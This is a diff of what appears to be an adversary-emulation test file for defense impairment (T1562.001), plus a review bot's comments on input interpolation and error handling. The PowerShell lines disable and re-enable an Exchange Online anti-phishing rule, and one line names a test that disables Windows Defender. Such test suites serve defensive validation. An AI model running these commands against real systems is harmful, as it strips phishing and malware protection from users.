 Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
 Get-AntiPhishRule
 cleanup_command: |
- $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ if("#{password}" -ne "") {
+ $secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
 $test = Get-AntiPhishRule
 Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
 Get-AntiPhishRule
+ }
 name: powershell
 elevation_required: false
 - name: Disable Windows Defender with DISM
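Review bot: `("#{password}" + "")` on the new `$secure_pwd` line of the T1562.001 hunk is a no-op concatenation — it neither changes the value nor guards the empty-string case, which the surrounding `if("#{password}" -ne "")` already handles — so either drop it or leave a comment saying what it is meant to protect against. Unlike the Azure AD cleanups in this commit, this block is not wrapped in try/catch, so a failed `Connect-ExchangeOnline` still surfaces loudly, which for an anti-phish rule left disabled is arguably the right behaviour; if the style is unified later, keep a warning in the catch. `"#{password}"` is interpolated into a double-quoted string, so a value containing `"` or `$` breaks the condition — pre-existing, but the new `if` doubles that exposure.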